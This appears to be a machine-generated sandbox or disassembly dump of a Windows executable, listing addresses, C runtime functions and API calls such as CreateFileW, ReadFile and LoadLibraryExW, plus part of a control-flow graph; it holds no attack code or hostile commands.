11107->11108 11108->11107 11110 7ff7f91efc21 11109->11110 11112 7ff7f91efbd1 11109->11112 11110->11091 11111 7ff7f91ee4f8 GetLastError SetLastError Is_bad_exception_allowed 11111->11112 11112->11110 11112->11111 11114 7ff7f91ef274 11113->11114 11115 7ff7f91ef1e5 11113->11115 11114->11070 11116 7ff7f91ee4f8 Is_bad_exception_allowed 2 API calls 11115->11116 11117 7ff7f91ef1ee 11116->11117 11117->11114 11118 7ff7f91ef207 11117->11118 11119 7ff7f91ee4f8 Is_bad_exception_allowed 2 API calls 11117->11119 11118->11114 11120 7ff7f91ef233 11118->11120 11121 7ff7f91ee4f8 Is_bad_exception_allowed 2 API calls 11118->11121 11119->11118 11122 7ff7f91ee50c 2 API calls 11120->11122 11121->11120 11123 7ff7f91ef247 11122->11123 11123->11114 11124 7ff7f91ef260 11123->11124 11125 7ff7f91ee4f8 Is_bad_exception_allowed 2 API calls 11123->11125 11126 7ff7f91ee50c 2 API calls 11124->11126 11125->11124 11126->11114 11128 7ff7f91ee160 __FrameHandler3::GetHandlerSearchState RtlLookupFunctionEntry 11127->11128 11129 7ff7f91ee9e1 11128->11129 11130 7ff7f91ee4f8 Is_bad_exception_allowed 2 API calls 11129->11130 11131 7ff7f91eea19 11130->11131 11132 7ff7f91ee364 RtlUnwindEx 11131->11132 11133 7ff7f91eea5d 11132->11133 11133->11070 11137 7ff7f91ee18e 11134->11137 11135 7ff7f91ee200 11138 7ff7f91ee364 RtlUnwindEx 11135->11138 11136 7ff7f91ee1b8 RtlLookupFunctionEntry 11136->11137 11137->11135 11137->11136 11139 7ff7f91ee45e 11138->11139 11139->11047 11141 7ff7f91ee160 __FrameHandler3::GetHandlerSearchState RtlLookupFunctionEntry 11140->11141 11142 7ff7f91ee652 11141->11142 11142->11100 10629 7ff7f91fb294 10630 7ff7f91fb2a5 FlsGetValue 10629->10630 10631 7ff7f91fb2c0 FlsSetValue 10629->10631 10632 7ff7f91fb2ba 10630->10632 10636 7ff7f91fb2b2 10630->10636 10633 7ff7f91fb2cd 10631->10633 10631->10636 10632->10631 10634 7ff7f91fec08 _fread_nolock HeapAlloc 10633->10634 10635 7ff7f91fb2dc 10634->10635 10637 7ff7f91fb2fa FlsSetValue 10635->10637 10638 7ff7f91fb2ea FlsSetValue 10635->10638 10640 7ff7f91fb306 FlsSetValue 10637->10640 10641 7ff7f91fb318 10637->10641 10639 7ff7f91fb2f3 10638->10639 10642 7ff7f91fa9b8 __free_lconv_mon 2 API calls 10639->10642 10640->10639 10643 7ff7f91fa9b8 __free_lconv_mon 2 API calls 10641->10643 10642->10636 10643->10636 10644 7ff7f9205994 10645 7ff7f92059be _get_daylight 10644->10645 10646 7ff7f9205aed 10645->10646 10647 7ff7f91fa970 9 API calls 10645->10647 10648 7ff7f9205b88 10647->10648 10649 7ff7f91f5994 10650 7ff7f91f59b0 10649->10650 10651 7ff7f91f59bd FileTimeToSystemTime 10649->10651 10650->10651 10653 7ff7f91f59b8 10650->10653 10652 7ff7f91f59d1 SystemTimeToTzSpecificLocalTime 10651->10652 10651->10653 10652->10653 11143 7ff7f91f3a14 11144 7ff7f91f3a56 11143->11144 11145 7ff7f91f3ac7 11143->11145 11148 7ff7f91f3a61 11144->11148 11149 7ff7f91f3b20 11144->11149 11153 7ff7f91f3a8b 11144->11153 11146 7ff7f91f3acc 11145->11146 11145->11149 11147 7ff7f91f3b01 11146->11147 11146->11148 11150 7ff7f91f19b4 3 API calls 11147->11150 11151 7ff7f91f41c8 3 API calls 11148->11151 11148->11153 11152 7ff7f91f21d4 3 API calls 11149->11152 11149->11153 11150->11153 11151->11153 11152->11153 10654 7ff7f91e6b90 10655 7ff7f91e6b9e 10654->10655 10656 7ff7f91e4620 2 API calls 10655->10656 10657 7ff7f91e6c0b 10655->10657 10656->10657 10658 7ff7f920aa7c 10659 7ff7f91edb70 __CxxCallCatchBlock 2 API calls 10658->10659 10660 7ff7f920aa94 10659->10660 10661 7ff7f91edb70 __CxxCallCatchBlock 2 API calls 10660->10661 10662 7ff7f920aaaf 10661->10662 10663 7ff7f91edb70 __CxxCallCatchBlock 2 API calls 10662->10663 10664 7ff7f920aac3 10663->10664 10665 7ff7f91edb70 __CxxCallCatchBlock 2 API calls 10664->10665 10666 7ff7f920ab05 10665->10666 11154 7ff7f91fa310 11155 7ff7f91fa325 11154->11155 11156 7ff7f91fa32d _initp_misc_winsig 11155->11156 11157 7ff7f91fa33d 11156->11157 10667 7ff7f91ecc90 10670 7ff7f91ed37c SetUnhandledExceptionFilter 10667->10670 10671 7ff7f91ed390 10672 7ff7f91ed3c4 10671->10672 10673 7ff7f91ed3a8 10671->10673 10673->10672 10680 7ff7f91eda70 10673->10680 10678 7ff7f91fa448 10 API calls 10679 7ff7f91ed3ea 10678->10679 10681 7ff7f91edb70 __CxxCallCatchBlock 2 API calls 10680->10681 10682 7ff7f91ed3d6 10681->10682 10683 7ff7f91eda84 10682->10683 10684 7ff7f91edb70 __CxxCallCatchBlock 2 API calls 10683->10684 10685 7ff7f91ed3e2 10684->10685 10685->10678 10691 7ff7f91fca88 10693 7ff7f91fcaa0 10691->10693 10692 7ff7f91fcb55 10693->10692 10694 7ff7f91fcb1e WriteFile 10693->10694 10694->10693 10695 7ff7f91fcb57 GetLastError 10694->10695 10695->10692 10696 7ff7f91fc488 10700 7ff7f91fc4a6 10696->10700 10697 7ff7f91fc575 10698 7ff7f91fc501 GetStdHandle 10699 7ff7f91fc514 GetFileType 10698->10699 10698->10700 10699->10700 10700->10697 10700->10698 10701 7ff7f91f8388 10702 7ff7f91f838d 10701->10702 10703 7ff7f91f83c8 10701->10703 10704 7ff7f91f83c0 10702->10704 10705 7ff7f91f83ae DeleteCriticalSection 10702->10705 10706 7ff7f91fa9b8 __free_lconv_mon 2 API calls 10704->10706 10705->10704 10705->10705 10706->10703 11158 7ff7f91f9208 11159 7ff7f91f9221 11158->11159 11160 7ff7f91f921d 11158->11160 11171 7ff7f920299c GetEnvironmentStringsW 11159->11171 11163 7ff7f91f9233 11166 7ff7f91fa9b8 __free_lconv_mon 2 API calls 11163->11166 11164 7ff7f91f923f 11187 7ff7f91f92ec 11164->11187 11166->11160 11168 7ff7f91fa9b8 __free_lconv_mon 2 API calls 11169 7ff7f91f9266 11168->11169 11170 7ff7f91fa9b8 __free_lconv_mon 2 API calls 11169->11170 11170->11160 11172 7ff7f91f922b 11171->11172 11173 7ff7f92029cc 11171->11173 11172->11163 11172->11164 11174 7ff7f9202a24 FreeEnvironmentStringsW 11173->11174 11175 7ff7f91fd66c _fread_nolock HeapAlloc 11173->11175 11174->11172 11176 7ff7f9202a37 11175->11176 11177 7ff7f9202a3f 11176->11177 11178 7ff7f9202a48 11176->11178 11179 7ff7f91fa9b8 __free_lconv_mon 2 API calls 11177->11179 11181 7ff7f9202a6f 11178->11181 11182 7ff7f9202a79 11178->11182 11180 7ff7f9202a46 11179->11180 11180->11174 11183 7ff7f91fa9b8 __free_lconv_mon 2 API calls 11181->11183 11184 7ff7f91fa9b8 __free_lconv_mon 2 API calls 11182->11184 11185 7ff7f9202a77 FreeEnvironmentStringsW 11183->11185 11184->11185 11185->11172 11188 7ff7f91f9311 11187->11188 11189 7ff7f91fec08 _fread_nolock HeapAlloc 11188->11189 11198 7ff7f91f9347 __std_exception_copy 11189->11198 11190 7ff7f91f934f 11191 7ff7f91fa9b8 __free_lconv_mon 2 API calls 11190->11191 11192 7ff7f91f9247 11191->11192 11192->11168 11193 7ff7f91f93c2 11194 7ff7f91fa9b8 __free_lconv_mon 2 API calls 11193->11194 11194->11192 11195 7ff7f91fec08 _fread_nolock HeapAlloc 11195->11198 11196 7ff7f91f93b1 11197 7ff7f91fa9b8 __free_lconv_mon 2 API calls 11196->11197 11197->11190 11198->11190 11198->11193 11198->11195 11198->11196 11199 7ff7f91f93e7 11198->11199 11201 7ff7f91fa9b8 __free_lconv_mon 2 API calls 11198->11201 11200 7ff7f91fa970 9 API calls 11199->11200 11202 7ff7f91f93fa 11200->11202 11201->11198 11203 7ff7f9202d08 11204 7ff7f9202d0d 11203->11204 11212 7ff7f9202d6e 11203->11212 11205 7ff7f9202d26 11204->11205 11206 7ff7f91fa9b8 __free_lconv_mon 2 API calls 11204->11206 11207 7ff7f9202d38 11205->11207 11208 7ff7f91fa9b8 __free_lconv_mon 2 API calls 11205->11208 11206->11205 11209 7ff7f9202d4a 11207->11209 11210 7ff7f91fa9b8 __free_lconv_mon 2 API calls 11207->11210 11208->11207 11211 7ff7f9202d5c 11209->11211 11213 7ff7f91fa9b8 __free_lconv_mon 2 API calls 11209->11213 11210->11209 11211->11212 11214 7ff7f91fa9b8 __free_lconv_mon 2 API calls 11211->11214 11213->11211 11214->11212 9394 7ff7f91e2fe0 9395 7ff7f91e2ff0 9394->9395 9396 7ff7f91e302b 9395->9396 9399 7ff7f91e3207 9395->9399 9405 7ff7f91e1470 9395->9405 9418 7ff7f91e1c80 9395->9418 9400 7ff7f91e3273 9399->9400 9422 7ff7f91fa474 9399->9422 9402 7ff7f91fa474 9 API calls 9400->9402 9403 7ff7f91e329c 9400->9403 9402->9403 9427 7ff7f91e2500 9403->9427 9437 7ff7f91e45b0 9405->9437 9407 7ff7f91e1493 9408 7ff7f91e149b 9407->9408 9445 7ff7f91f0744 9407->9445 9408->9395 9410 7ff7f91e14d1 9411 7ff7f91e1538 9410->9411 9416 7ff7f91e154b 9410->9416 9417 7ff7f91e14d5 9410->9417 9449 7ff7f91e1210 9411->9449 9414 7ff7f91e15c4 9414->9395 9416->9417 9457 7ff7f91f040c 9416->9457 9453 7ff7f91f00bc 9417->9453 9419 7ff7f91e1ca5 9418->9419 9620 7ff7f91f49f4 9419->9620 9421 7ff7f91e1cc8 9421->9395 9423 7ff7f91fa48b __std_exception_copy 9422->9423 9424 7ff7f91fa4bc 9422->9424 9423->9424 9425 7ff7f91fa970 9 API calls 9423->9425 9424->9400 9426 7ff7f91fa4e8 9425->9426 9428 7ff7f91e252c 9427->9428 9429 7ff7f91e2536 9427->9429 9430 7ff7f91e9400 2 API calls 9428->9430 9431 7ff7f91e254b 9429->9431 9432 7ff7f91e9400 2 API calls 9429->9432 9430->9429 9433 7ff7f91e2560 9431->9433 9434 7ff7f91e9400 2 API calls 9431->9434 9432->9431 9631 7ff7f91e2390 9433->9631 9434->9433 9436 7ff7f91e257c 9436->9396 9438 7ff7f91e45bc 9437->9438 9460 7ff7f91e9400 9438->9460 9440 7ff7f91e45e4 9441 7ff7f91e9400 2 API calls 9440->9441 9442 7ff7f91e45f7 9441->9442 9465 7ff7f91f6004 9442->9465 9444 7ff7f91e4606 9444->9407 9446 7ff7f91f0774 9445->9446 9593 7ff7f91f04d4 9446->9593 9448 7ff7f91f078d 9448->9410 9450 7ff7f91e1268 9449->9450 9451 7ff7f91e126f 9450->9451 9452 7ff7f91f040c _fread_nolock 14 API calls 9450->9452 9451->9417 9452->9450 9454 7ff7f91f00ec 9453->9454 9602 7ff7f91efe98 9454->9602 9456 7ff7f91f0105 9456->9414 9611 7ff7f91f042c 9457->9611 9459 7ff7f91f0424 9459->9416 9461 7ff7f91e9422 MultiByteToWideChar 9460->9461 9464 7ff7f91e9446 9460->9464 9463 7ff7f91e945c 9461->9463 9461->9464 9462 7ff7f91e9463 MultiByteToWideChar 9462->9463 9463->9440 9464->9462 9464->9463 9466 7ff7f91f5f38 9465->9466 9469 7ff7f91f5f5e _invalid_parameter_noinfo 9466->9469 9473 7ff7f91fac98 9466->9473 9469->9444 9471 7ff7f91f5fd8 9484 7ff7f91f54e8 LeaveCriticalSection 9471->9484 9485 7ff7f9200348 EnterCriticalSection 9473->9485 9475 7ff7f91facaf 9476 7ff7f91fad0c EnterCriticalSection LeaveCriticalSection HeapFree GetLastError HeapAlloc 9475->9476 9477 7ff7f91facba 9476->9477 9478 7ff7f92003a8 _isindst LeaveCriticalSection 9477->9478 9479 7ff7f91f5fae 9478->9479 9479->9469 9480 7ff7f91fff3c 9479->9480 9481 7ff7f91fff62 9480->9481 9482 7ff7f91fff96 9481->9482 9486 7ff7f9206dc4 9481->9486 9482->9471 9489 7ff7f92063c4 9486->9489 9488 7ff7f9206df1 9488->9482 9490 7ff7f92063f9 9489->9490 9492 7ff7f92063db _invalid_parameter_noinfo 9489->9492 9490->9492 9493 7ff7f92069d4 9490->9493 9492->9488 9494 7ff7f9206a1b 9493->9494 9495 7ff7f9206a86 CreateFileW 9494->9495 9500 7ff7f9206a49 9494->9500 9496 7ff7f9206af1 9495->9496 9497 7ff7f9206b6c GetFileType 9495->9497 9498 7ff7f9206b39 GetLastError 9496->9498 9501 7ff7f9206aff CreateFileW 9496->9501 9499 7ff7f9206b79 GetLastError 9497->9499 9503 7ff7f9206bca 9497->9503 9498->9500 9502 7ff7f91f4eec 9499->9502 9500->9492 9501->9497 9501->9498 9504 7ff7f9206b88 CloseHandle 9502->9504 9515 7ff7f91f84a8 9503->9515 9504->9500 9514 7ff7f9206bba 9504->9514 9506 7ff7f9206bec 9509 7ff7f9206c47 9506->9509 9523 7ff7f9206488 9506->9523 9508 7ff7f9206c7e 9508->9509 9510 7ff7f9206c8d 9508->9510 9519 7ff7f91fab30 9509->9519 9510->9500 9512 7ff7f9206d0c CloseHandle CreateFileW 9510->9512 9513 7ff7f9206d53 GetLastError 9512->9513 9512->9514 9513->9514 9514->9500 9516 7ff7f91f8529 9515->9516 9517 7ff7f91f84cb 9515->9517 9516->9506 9517->9516 9518 7ff7f91f8520 SetStdHandle 9517->9518 9518->9516 9520 7ff7f91fab60 9519->9520 9540 7ff7f91fabc8 9520->9540 9522 7ff7f91fab79 9522->9500 9524 7ff7f92064d9 9523->9524 9535 7ff7f92065aa 9523->9535 9525 7ff7f92066f3 9524->9525 9529 7ff7f92064f8 9524->9529 9570 7ff7f91fa970 IsProcessorFeaturePresent 9525->9570 9528 7ff7f92065f6 9528->9535 9549 7ff7f91fbacc 9528->9549 9529->9528 9529->9535 9545 7ff7f91fc2f4 9529->9545 9532 7ff7f92065e4 9532->9535 9537 7ff7f91fc2f4 _fread_nolock 2 API calls 9532->9537 9533 7ff7f920668a 9536 7ff7f91fc2f4 _fread_nolock 2 API calls 9533->9536 9534 7ff7f9206628 9534->9533 9534->9535 9538 7ff7f920666d 9534->9538 9535->9508 9536->9535 9537->9528 9539 7ff7f91fc2f4 _fread_nolock 2 API calls 9538->9539 9539->9535 9542 7ff7f91fabe4 9540->9542 9541 7ff7f91fac33 CloseHandle 9543 7ff7f91fac40 GetLastError 9541->9543 9544 7ff7f91fabea 9541->9544 9542->9541 9542->9544 9543->9544 9544->9522 9546 7ff7f91fc324 9545->9546 9574 7ff7f91fc1a4 9546->9574 9548 7ff7f91fc33d 9548->9532 9550 7ff7f91fbb0d 9549->9550 9552 7ff7f91fbaf4 _invalid_parameter_noinfo 9549->9552 9551 7ff7f91fbbb9 _fread_nolock 9550->9551 9550->9552 9553 7ff7f91fbbc6 _invalid_parameter_noinfo 9550->9553 9579 7ff7f91fd66c 9550->9579 9551->9553 9559 7ff7f91fbd8e 9551->9559 9561 7ff7f91fbd21 GetConsoleMode 9551->9561 9552->9534 9568 7ff7f91fa9b8 __free_lconv_mon 2 API calls 9553->9568 9555 7ff7f91fbc04 9583 7ff7f91fa9b8 9555->9583 9557 7ff7f91fbc0e 9558 7ff7f91fa9b8 __free_lconv_mon 2 API calls 9557->9558 9562 7ff7f91fbc15 9558->9562 9560 7ff7f91fbd93 ReadFile 9559->9560 9563 7ff7f91fbead GetLastError 9560->9563 9564 7ff7f91fbdb9 9560->9564 9561->9559 9565 7ff7f91fbd35 9561->9565 9562->9553 9566 7ff7f91fc2f4 _fread_nolock 2 API calls 9562->9566 9563->9553 9564->9553 9564->9563 9565->9560 9567 7ff7f91fbd3f ReadConsoleW 9565->9567 9566->9551 9567->9553 9569 7ff7f91fbd63 GetLastError 9567->9569 9568->9552 9569->9553 9571 7ff7f91fa983 9570->9571 9587 7ff7f91fa684 9571->9587 9573 7ff7f91fa99e GetCurrentProcess TerminateProcess 9575 7ff7f91fc1cb 9574->9575 9576 7ff7f91fc1e2 SetFilePointerEx 9575->9576 9578 7ff7f91fc1d1 9575->9578 9577 7ff7f91fc1fa GetLastError 9576->9577 9576->9578 9577->9578 9578->9548 9581 7ff7f91fd6b5 9579->9581 9582 7ff7f91fd67b 9579->9582 9580 7ff7f91fd69e HeapAlloc 9580->9581 9580->9582 9581->9555 9582->9580 9582->9581 9584 7ff7f91fa9e5 9583->9584 9585 7ff7f91fa9bd HeapFree 9583->9585 9584->9557 9585->9584 9586 7ff7f91fa9d8 GetLastError 9585->9586 9586->9584 9588 7ff7f91fa6be 9587->9588 9589 7ff7f91fa6e6 RtlCaptureContext RtlLookupFunctionEntry 9588->9589 9590 7ff7f91fa756 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 9589->9590 9591 7ff7f91fa720 RtlVirtualUnwind 9589->9591 9592 7ff7f91fa7a8 9590->9592 9591->9590 9592->9573 9594 7ff7f91f053e 9593->9594 9596 7ff7f91f04fe 9593->9596 9594->9596 9601 7ff7f91f54dc EnterCriticalSection 9594->9601 9596->9448 9597 7ff7f91f054f 9598 7ff7f91f0658 SetFilePointerEx GetLastError 9597->9598 9599 7ff7f91f0561 9598->9599 9600 7ff7f91f54e8 _fread_nolock LeaveCriticalSection 9599->9600 9600->9596 9603 7ff7f91efee1 9602->9603 9606 7ff7f91efeb3 9602->9606 9603->9606 9610 7ff7f91f54dc EnterCriticalSection 9603->9610 9605 7ff7f91efef8 9607 7ff7f91eff14 EnterCriticalSection HeapFree GetLastError CloseHandle GetLastError 9605->9607 9606->9456 9608 7ff7f91eff04 9607->9608 9609 7ff7f91f54e8 _fread_nolock LeaveCriticalSection 9608->9609 9609->9606 9612 7ff7f91f0456 9611->9612 9618 7ff7f91f0465 _invalid_parameter_noinfo 9611->9618 9612->9618 9619 7ff7f91f54dc EnterCriticalSection 9612->9619 9614 7ff7f91f04aa 9615 7ff7f91f01ac _fread_nolock 12 API calls 9614->9615 9616 7ff7f91f04c1 9615->9616 9617 7ff7f91f54e8 _fread_nolock LeaveCriticalSection 9616->9617 9617->9618 9618->9459 9623 7ff7f91f4a4e 9620->9623 9621 7ff7f91f4a73 9621->9421 9622 7ff7f91f4b8c 9624 7ff7f91fa9b8 __free_lconv_mon 2 API calls 9622->9624 9623->9621 9623->9622 9625 7ff7f91f4b61 9623->9625 9626 7ff7f91f4bb0 9623->9626 9629 7ff7f91f4b58 9623->9629 9624->9621 9628 7ff7f91fa9b8 __free_lconv_mon 2 API calls 9625->9628 9626->9622 9627 7ff7f91f4bba 9626->9627 9630 7ff7f91fa9b8 __free_lconv_mon 2 API calls 9627->9630 9628->9621 9629->9622 9629->9625 9630->9621 9632 7ff7f91ec8c0 9631->9632 9633 7ff7f91e23a9 GetModuleHandleW 9632->9633 9634 7ff7f91e23e5 9633->9634 9646 7ff7f91f79dc 9634->9646 9637 7ff7f91f79dc 9 API calls 9638 7ff7f91e245e 9637->9638 9639 7ff7f91f79dc 9 API calls 9638->9639 9640 7ff7f91e246b DialogBoxIndirectParamW 9639->9640 9641 7ff7f91e24a1 9640->9641 9642 7ff7f91e24c1 DeleteObject 9641->9642 9643 7ff7f91e24c7 9641->9643 9642->9643 9644 7ff7f91e24d3 DestroyIcon 9643->9644 9645 7ff7f91e24d9 9643->9645 9644->9645 9645->9436 9647 7ff7f91e2451 9646->9647 9648 7ff7f91f79fa 9646->9648 9647->9637 9648->9647 9649 7ff7f91fa970 9 API calls 9648->9649 9650 7ff7f91f7a5d 9649->9650 10707 7ff7f91fa360 10708 7ff7f91fa379 10707->10708 10710 7ff7f91fa391 10707->10710 10709 7ff7f91fa9b8 __free_lconv_mon 2 API calls 10708->10709 10708->10710 10709->10710 10711 7ff7f91f3460 10713 7ff7f91f346e 10711->10713 10717 7ff7f91f3484 10711->10717 10712 7ff7f91f3a56 10716 7ff7f91f3a61 10712->10716 10718 7ff7f91f3b20 10712->10718 10722 7ff7f91f3a8b 10712->10722 10713->10712 10714 7ff7f91f3acc 10713->10714 10713->10717 10713->10718 10715 7ff7f91f3b01 10714->10715 10714->10716 10727 7ff7f91f19b4 10715->10727 10716->10722 10723 7ff7f91f41c8 10716->10723 10718->10722 10731 7ff7f91f21d4 10718->10731 10724 7ff7f91f41ee 10723->10724 10735 7ff7f91f0bf0 10724->10735 10726 7ff7f91f423e 10726->10722 10728 7ff7f91f19e7 10727->10728 10730 7ff7f91f1a53 10728->10730 10743 7ff7f91f0c98 10728->10743 10730->10722 10732 7ff7f91f2207 10731->10732 10733 7ff7f91f0c98 3 API calls 10732->10733 10734 7ff7f91f2273 10732->10734 10733->10734 10734->10722 10736 7ff7f91f0c27 10735->10736 10742 7ff7f91f0c16 10735->10742 10737 7ff7f91fd66c _fread_nolock HeapAlloc 10736->10737 10736->10742 10738 7ff7f91f0c54 10737->10738 10739 7ff7f91f0c68 10738->10739 10740 7ff7f91fa9b8 __free_lconv_mon 2 API calls 10738->10740 10741 7ff7f91fa9b8 __free_lconv_mon 2 API calls 10739->10741 10740->10739 10741->10742 10742->10726 10744 7ff7f91f0ccf 10743->10744 10750 7ff7f91f0cbe 10743->10750 10745 7ff7f91fd66c _fread_nolock HeapAlloc 10744->10745 10744->10750 10746 7ff7f91f0d00 10745->10746 10747 7ff7f91f0d14 10746->10747 10748 7ff7f91fa9b8 __free_lconv_mon 2 API calls 10746->10748 10749 7ff7f91fa9b8 __free_lconv_mon 2 API calls 10747->10749 10748->10747 10749->10750 10750->10730 10751 7ff7f91fe374 10752 7ff7f920411c 10 API calls 10751->10752 10753 7ff7f91fe3c1 10752->10753 10754 7ff7f91e6c70 10755 7ff7f91e6ca0 10754->10755 10756 7ff7f91e4550 2 API calls 10755->10756 10757 7ff7f91e6ca8 10756->10757 10757->10757 11215 7ff7f92034f0 GetProcessHeap 10758 7ff7f920326c 10759 7ff7f920329d 10758->10759 10760 7ff7f9203271 10758->10760 10760->10759 10761 7ff7f91fa9b8 __free_lconv_mon 2 API calls 10760->10761 10761->10759 11216 7ff7f920abe5 11217 7ff7f91edb70 __CxxCallCatchBlock 2 API calls 11216->11217 11218 7ff7f920abf3 11217->11218 11219 7ff7f91edb70 __CxxCallCatchBlock 2 API calls 11218->11219 11220 7ff7f920abfe 11218->11220 11219->11220 11221 7ff7f920a9e6 11222 7ff7f920a9fe 11221->11222 11228 7ff7f920aa69 11221->11228 11223 7ff7f91edb70 __CxxCallCatchBlock 2 API calls 11222->11223 11222->11228 11224 7ff7f920aa4b 11223->11224 11225 7ff7f91edb70 __CxxCallCatchBlock 2 API calls 11224->11225 11226 7ff7f920aa60 11225->11226 11227 7ff7f91fa448 10 API calls 11226->11227 11227->11228

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 0 7ff7f91e1000-7ff7f91e3806 call 7ff7f91efe88 call 7ff7f91efe90 call 7ff7f91ec8c0 call 7ff7f91f5460 call 7ff7f91f54f4 call 7ff7f91e36b0 14 7ff7f91e3814-7ff7f91e3836 call 7ff7f91e1950 0->14 15 7ff7f91e3808-7ff7f91e380f 0->15 21 7ff7f91e383c-7ff7f91e3856 call 7ff7f91e1c80 14->21 22 7ff7f91e391b-7ff7f91e3931 call 7ff7f91e45b0 14->22 16 7ff7f91e3c97-7ff7f91e3cb2 call 7ff7f91ec5c0 15->16 26 7ff7f91e385b-7ff7f91e389b call 7ff7f91e8a20 21->26 27 7ff7f91e3933-7ff7f91e3960 call 7ff7f91e7f80 22->27 28 7ff7f91e396a-7ff7f91e397f call 7ff7f91e2710 22->28 35 7ff7f91e38c1-7ff7f91e38cc call 7ff7f91f4fa0 26->35 36 7ff7f91e389d-7ff7f91e38a3 26->36 38 7ff7f91e3984-7ff7f91e39a6 call 7ff7f91e1c80 27->38 39 7ff7f91e3962-7ff7f91e3965 call 7ff7f91f00bc 27->39 40 7ff7f91e3c8f 28->40 48 7ff7f91e38d2-7ff7f91e38e1 call 7ff7f91e8a20 35->48 49 7ff7f91e39fc-7ff7f91e3a2a call 7ff7f91e8b30 call 7ff7f91e8b90 * 3 35->49 41 7ff7f91e38a5-7ff7f91e38ad 36->41 42 7ff7f91e38af-7ff7f91e38bd call 7ff7f91e8b90 36->42 53 7ff7f91e39b0-7ff7f91e39b9 38->53 39->28 40->16 41->42 42->35 57 7ff7f91e39f4-7ff7f91e39f7 call 7ff7f91f4fa0 48->57 58 7ff7f91e38e7-7ff7f91e38ed 48->58 76 7ff7f91e3a2f-7ff7f91e3a3e call 7ff7f91e8a20 49->76 53->53 56 7ff7f91e39bb-7ff7f91e39d8 call 7ff7f91e1950 53->56 56->26 65 7ff7f91e39de-7ff7f91e39ef call 7ff7f91e2710 56->65 57->49 62 7ff7f91e38f0-7ff7f91e38fc 58->62 66 7ff7f91e3905-7ff7f91e3908 62->66 67 7ff7f91e38fe-7ff7f91e3903 62->67 65->40 66->57 70 7ff7f91e390e-7ff7f91e3916 call 7ff7f91f4fa0 66->70 67->62 67->66 70->76 79 7ff7f91e3a44-7ff7f91e3a47 76->79 80 7ff7f91e3b45-7ff7f91e3b53 76->80 79->80 81 7ff7f91e3a4d-7ff7f91e3a50 79->81 82 7ff7f91e3a67 80->82 83 7ff7f91e3b59-7ff7f91e3b5d 80->83 84 7ff7f91e3b14-7ff7f91e3b17 81->84 85 7ff7f91e3a56-7ff7f91e3a5a 81->85 86 7ff7f91e3a6b-7ff7f91e3a90 call 7ff7f91f4fa0 82->86 83->86 88 7ff7f91e3b2f-7ff7f91e3b40 call 7ff7f91e2710 84->88 89 7ff7f91e3b19-7ff7f91e3b1d 84->89 85->84 87 7ff7f91e3a60 85->87 95 7ff7f91e3a92-7ff7f91e3aa6 call 7ff7f91e8b30 86->95 96 7ff7f91e3aab-7ff7f91e3ac0 86->96 87->82 97 7ff7f91e3c7f-7ff7f91e3c87 88->97 89->88 91 7ff7f91e3b1f-7ff7f91e3b2a 89->91 91->86 95->96 99 7ff7f91e3ac6-7ff7f91e3aca 96->99 100 7ff7f91e3be8-7ff7f91e3bfa call 7ff7f91e8a20 96->100 97->40 102 7ff7f91e3ad0-7ff7f91e3ae8 call 7ff7f91f52c0 99->102 103 7ff7f91e3bcd-7ff7f91e3be2 call 7ff7f91e1940 99->103 108 7ff7f91e3bfc-7ff7f91e3c02 100->108 109 7ff7f91e3c2e 100->109 114 7ff7f91e3b62-7ff7f91e3b7a call 7ff7f91f52c0 102->114 115 7ff7f91e3aea-7ff7f91e3b02 call 7ff7f91f52c0 102->115 103->99 103->100 112 7ff7f91e3c04-7ff7f91e3c1c 108->112 113 7ff7f91e3c1e-7ff7f91e3c2c 108->113 111 7ff7f91e3c31-7ff7f91e3c40 call 7ff7f91f4fa0 109->111 123 7ff7f91e3c46-7ff7f91e3c4a 111->123 124 7ff7f91e3d41-7ff7f91e3d63 call 7ff7f91e44d0 111->124 112->111 113->111 125 7ff7f91e3b7c-7ff7f91e3b80 114->125 126 7ff7f91e3b87-7ff7f91e3b9f call 7ff7f91f52c0 114->126 115->103 122 7ff7f91e3b08-7ff7f91e3b0f 115->122 122->103 128 7ff7f91e3cd4-7ff7f91e3ce6 call 7ff7f91e8a20 123->128 129 7ff7f91e3c50-7ff7f91e3c5f call 7ff7f91e90e0 123->129 139 7ff7f91e3d65-7ff7f91e3d6f call 7ff7f91e4620 124->139 140 7ff7f91e3d71-7ff7f91e3d82 call 7ff7f91e1c80 124->140 125->126 135 7ff7f91e3ba1-7ff7f91e3ba5 126->135 136 7ff7f91e3bac-7ff7f91e3bc4 call 7ff7f91f52c0 126->136 144 7ff7f91e3d35-7ff7f91e3d3c 128->144 145 7ff7f91e3ce8-7ff7f91e3ceb 128->145 142 7ff7f91e3cb3-7ff7f91e3cbd call 7ff7f91e8850 129->142 143 7ff7f91e3c61 129->143 135->136 136->103 155 7ff7f91e3bc6 136->155 153 7ff7f91e3d87-7ff7f91e3d96 139->153 140->153 162 7ff7f91e3cbf-7ff7f91e3cc6 142->162 163 7ff7f91e3cc8-7ff7f91e3ccf 142->163 150 7ff7f91e3c68 call 7ff7f91e2710 143->150 144->150 145->144 151 7ff7f91e3ced-7ff7f91e3d10 call 7ff7f91e1c80 145->151 164 7ff7f91e3c6d-7ff7f91e3c77 150->164 168 7ff7f91e3d12-7ff7f91e3d26 call 7ff7f91e2710 call 7ff7f91f4fa0 151->168 169 7ff7f91e3d2b-7ff7f91e3d33 call 7ff7f91f4fa0 151->169 158 7ff7f91e3dc4-7ff7f91e3dda call 7ff7f91e9400 153->158 159 7ff7f91e3d98-7ff7f91e3d9f 153->159 155->103 171 7ff7f91e3ddc 158->171 172 7ff7f91e3de8-7ff7f91e3e04 SetDllDirectoryW 158->172 159->158 160 7ff7f91e3da1-7ff7f91e3da5 159->160 160->158 166 7ff7f91e3da7-7ff7f91e3dbe SetDllDirectoryW LoadLibraryExW 160->166 162->150 163->153 164->97 166->158 168->164 169->153 171->172 175 7ff7f91e3f01-7ff7f91e3f08 172->175 176 7ff7f91e3e0a-7ff7f91e3e19 call 7ff7f91e8a20 172->176 179 7ff7f91e3ffc-7ff7f91e4004 175->179 180 7ff7f91e3f0e-7ff7f91e3f15 175->180 189 7ff7f91e3e32-7ff7f91e3e3c call 7ff7f91f4fa0 176->189 190 7ff7f91e3e1b-7ff7f91e3e21 176->190 184 7ff7f91e4006-7ff7f91e4023 PostMessageW GetMessageW 179->184 185 7ff7f91e4029-7ff7f91e4034 call 7ff7f91e36a0 call 7ff7f91e3360 179->185 180->179 183 7ff7f91e3f1b-7ff7f91e3f25 call 7ff7f91e33c0 180->183 